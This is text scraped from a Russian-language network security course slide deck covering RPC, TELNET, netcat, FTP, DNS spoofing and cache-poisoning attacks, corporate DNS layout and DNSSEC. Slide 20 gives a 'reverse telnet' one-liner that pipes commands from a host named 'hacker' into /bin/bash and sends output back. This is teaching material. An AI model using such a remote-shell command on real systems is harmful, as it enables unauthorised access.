Скачать презентацию
Идет загрузка презентации. Пожалуйста, подождите
Презентация была опубликована 10 лет назад пользователемАнгелина Ерохина
2 Прикладные службы
3 Клиент Сервер Протокол обмена TELNET FTP HTTP Реализация служб прикладного уровня
4 Удалённый вызов процедур Канальный уровень Физический уровень Сетевой уровень Транспортный уровень Уровень соединения Уровень представления Уровень приложения Ethernet, FDDI, X.25 и другие Сетевой уровень IP TCP, UDP RPC У Ч Е Б Н Ы Й Ц Е Н Т Р ИНФОРМЗАЩИТА
5 Клиент Сервер RPC Протокол RPC Спецификация RPC-сервера Номер программы Номер процедуры Номер версии
6 Клиент Сервер RPC Запрос клиента Спецификация RPC-сервера Номер программы Номер процедуры Номер версии Номер порта
7 Клиент Сервер RPC Номер процедуры RPC-сканирование Номер порта
8 Клиент (утилита telnet) Сервер (telnetd) Протокол обмена TELNET Протокол удалённого терминала - TELNET
9 Варианты взаимодействия по протоколу TELNET Терминал – Серверный процесс Терминал – Терминал Процесс – Процесс
10 Взаимодействие «терминал-удалённый процесс» Терминал – Серверный процесс $a a a a
11 Команды протокола TELNET Управляющий символ IACКоманда Параметры Interpret as Command, равен 255 Например, клавиша Backspace, байт
12 Команды протокола TELNET Название команды Код Описание команды IP (Interrupt Process)244 Прерывание процесса пользователя AO (Abort Output)245 Остановка вывода на дисплей AYT (Are You There)246Проверка состояния системы EC (Erase Character)247 Удаление последнего введённого символа EL (Erase Line)248Удаление текущей строки
13 Передача команд $a IAC EC Backspace $
14 Клиент (утилита telnet) Сервер (telnetd) Передача имени и пароля в открытом виде Уязвимости протокола TELNET
15 Изменение переменных окружения до аутентификации Уязвимости протокола TELNET Клиент (утилита telnet) Сервер (telnetd)
16 Что такое Netcat? Netcat - это утилита, которая позволяет читать и записывать данные по сети с использованием протоколов TCP или UDP. Возможности netcat : Работа с входящими и исходящими TCP или UDP соединениями, использующими любые порты Выполнение DNS запросов различных типов Возможность задания порта источника Возможность использования любого адреса источника (из локально сконфигурированных) Возможности по сканированию портов Работа в качестве telnet-сервера
17 Netcat и Telnet Telnet имеет ограничения, преодолеть которые поможет Netcat. Например: Ограничения стандартного потока ввода Посылка сообщений об ошибках в стандартный поток вывода, вместе с данными Невозможность посылки двоичных данных Невозможность находиться в состоянии ожидания соединения Невозможность работы с UDP
18 Режимы работы Netcat Режим исходящих соединений Режим ожидания входящих соединений Слушающий порт nc [-опции] порт[ы] nc –l –p [-опции] [узел] [порт]
19 «Обращённый» TELNET
20 80 25 > telnet hacker 80 | /bin/bash | telnet hacker 25 /bin/bash Команды Результаты
21 Клиент Сервер Команды Ответы Реализация службы FTP Интерфейс пользователя Модуль управления передачей Модуль передачи данных Данные Модуль управления передачей Модуль передачи данных
22 telnet Resolver - ? DNS Server DNS - служба
23 Домены и поддомены « » orgedu com company sale buhg Root Name Server company.com Name Server sale.company.com Name Server
24 Записи Resource Record main.sale.company.com. IN A sale sale.company.com Name Server sale.company.com. IN NS ns.sale.company.com
25 Разрешение имён ResolverResolver main.sale.company.com - ? com Name Server Root Server company.com NS sale.company.com NS
26 Применение транспортного протокола без установления соединения (UDP) Отсутствие идентификации и аутентификации Отсутствие средств разграничения доступа Уязвимости службы DNS
27 Пример атаки на IP - сеть: Атака на DNS Нарушение нормального функционирования объекта атаки Местонахождение атакующего В одном сегменте с объектом атаки Используемые уязвимости Цель Слабая защищённость протокола DNS - - недостаток проектирования Степень риска Высока я Нарушение навигации (ложный маршрут) Механизм реализации
28 Схема работы DNS - протокола DNS-сервер Хост А IP - адрес ID Имя компьютера SourcePort DNS-запрос DNS-ответ ID - генерируется приложением, пославшим запрос, обычно=1 SourcePort вначале принимает значение 1024 а потом увеличивается Пример атаки на IP - сеть: Атака на DNS
29 DNS-сервер Хост А ID Имя компьютера SourcePort DNS-запрос Хост А посылает DNS - запрос Нарушитель должен находиться в одной подсети с А или в одной подсети с DNS - сервером Это позволит ему перехватить пакет с запросом Пример атаки на IP - сеть: Атака на DNS
30 DNS-сервер Хост А DNS-запрос Нарушитель извлекает из запроса ID и SourcePort Ложный DNS - ответ: от имени настоящего DNS - сервера, но в качестве IP - адреса искомого узла указывается IP - адрес нарушителя Результат: хост А имеет неправильное соответствие между именем компьютера и IP - адресом Пример атаки на IP - сеть: Атака на DNS
31 Хост А Узел сети Теперь путь пакета от хоста А до узла сети будет лежать через хост нарушителя Пример атаки на IP - сеть: Атака на DNS
32 Пример атаки на IP - сеть: Атака на DNS (вариант 2) Нарушение нормального функционирования объекта атаки Местонахождение атакующего В разных сегментах с объектом атаки Используемые уязвимости Цель Слабая защищённость протокола DNS - - недостаток проектирования Степень риска Высока я Нарушение навигации (ложный маршрут) Механизм реализации
33 DNS-сервер Хост А ID IP - адрес DestPort Ложные DNS - ответы Перебор Пример атаки на IP - сеть: Атака на DNS (вариант 2)
34 DNS-сервер Хост А Ложные DNS - ответы Пример атаки на IP - сеть: Атака на DNS (вариант 2)
35 Хост А Узел сети Теперь путь пакета от хоста А до узла сети будет лежать через хост нарушителя Пример атаки на IP - сеть: Атака на DNS (вариант 2)
36 DNS-сервер ertr.mpei.ac.ru. Кэш - таблица DNS-сервер следующего уровня DNS-запрос DNS-ответ Пример атаки на IP - сеть: Атака на DNS (вариант 3)
37 DNS-сервер ertr.mpei.ac.ru. Кэш - таблица DNS-сервер следующего уровня DNS-запрос Ложные DNS - ответы Пример атаки на IP - сеть: Атака на DNS (вариант 3)
38 DNS-сервер ertr.mpei.ac.ru. Кэш - таблица Хост А DNS-запрос DNS-ответ Пример атаки на IP - сеть: Атака на DNS (вариант 3)
39 DNS в корпоративной сети Внешний узел Вторичный сервер Внутренний узел Первичный сервер Репликация Рекурсивный запрос Рекурсивные запросы Итеративные запросы DNS
40 DNS в корпоративной сети Доступ узлов корпоративной сети к полной информации о внутренних именах Доступ отдельных узлов корпоративной сети к глобальному пространству имён Internet Доступ внешних узлов к минимально необходимой информации о внутренних именах
41 Двухсерверная конфигурация Внешний узел Вторичный сервер Внутренний узел Первичный сервер (минимальная версия) Репликация Рекурсивный запрос Рекурсивный запрос Итеративные запросы Межсетевой экран Первичный сервер (полная версия) DNS
42 Трехсерверная конфигурация Внешний узел Вторичный сервер (минимальная версия) Внутренний узел (с Internet) Первичный сервер (минимальная версия) Репликация Рекурсивный запрос Рекурсивный запрос Итеративные запросы Межсетевой экран Первичный сервер (полная версия+корень) DNS Вторичный сервер (полная версия) Внутренний узел (без Internet)
43 Трёхсерверная конфигурация Первичный сервер (минимальная версия) Межсетевой экран Первичный сервер (полная версия) +корень DNS Вторичный сервер (полная версия) Internet
44 Протокол DNSSec Механизм распределения открытых ключей Целостность и аутентичность информации DNS Аутентификация транзакции
45 Новые записи Resource Record main.sale.company.com. IN A sale.company.com. IN NS ns.sale.company.com sale.company.com. IN KEY [ключ] sale.company.com. IN SIG [подпись] sale.company.com. IN NXT [домен]
46 Обычный DNS-запрос qname=main.sale.company.com qtype=A main.sale.company.com A Владелец sale.company.com NS ns.sale.company.com Дополнительно ns.sale.company.com A Запрос Ответ
47 Запрос DNSSec qname=main.sale.company.com qtype=A Вопрос main.sale.company.com A ? main.sale.company.com A main.sale.company.com SIG [подпись] Владелец sale.company.com NS ns.sale.company.com sale.company.com SIG [подпись] Дополнительно ns.sale.company.com A ns.sale.company.com SIG [подпись] sale.company.com KEY [ключ] main.sale.company.com KEY [ключ] ns.sale.company.com KEY [ключ] Запрос Ответ
48 Раздел 2 – Итоги Модель OSI. Архитектура TCP/IP. Модель OSI. Архитектура TCP/IP. Модель OSI. Архитектура TCP/IP. Модель OSI. Архитектура TCP/IP. Сетевые анализаторы. Сетевые анализаторы. Сетевые анализаторы. Сетевые анализаторы. Программа Internet Scanner. Программа Internet Scanner. Программа Internet Scanner. Программа Internet Scanner. Межсетевые экраны. Межсетевые экраны. Межсетевые экраны. Межсетевые экраны. Протоколы IPSec, SSL, SSH, DNSSec Протоколы IPSec, SSL, SSH, DNSSec Протоколы IPSec, SSL, SSH, DNSSec Протоколы IPSec, SSL, SSH, DNSSec Система обнаружения атак RealSecure. Система обнаружения атак RealSecure. Система обнаружения атак RealSecure. Система обнаружения атак RealSecure. Cлужбы прикладного уровня. Cлужбы прикладного уровня. Cлужбы прикладного уровня. Cлужбы прикладного уровня.
Еще похожие презентации в нашем архиве:
© 2024 MyShared Inc.
All rights reserved.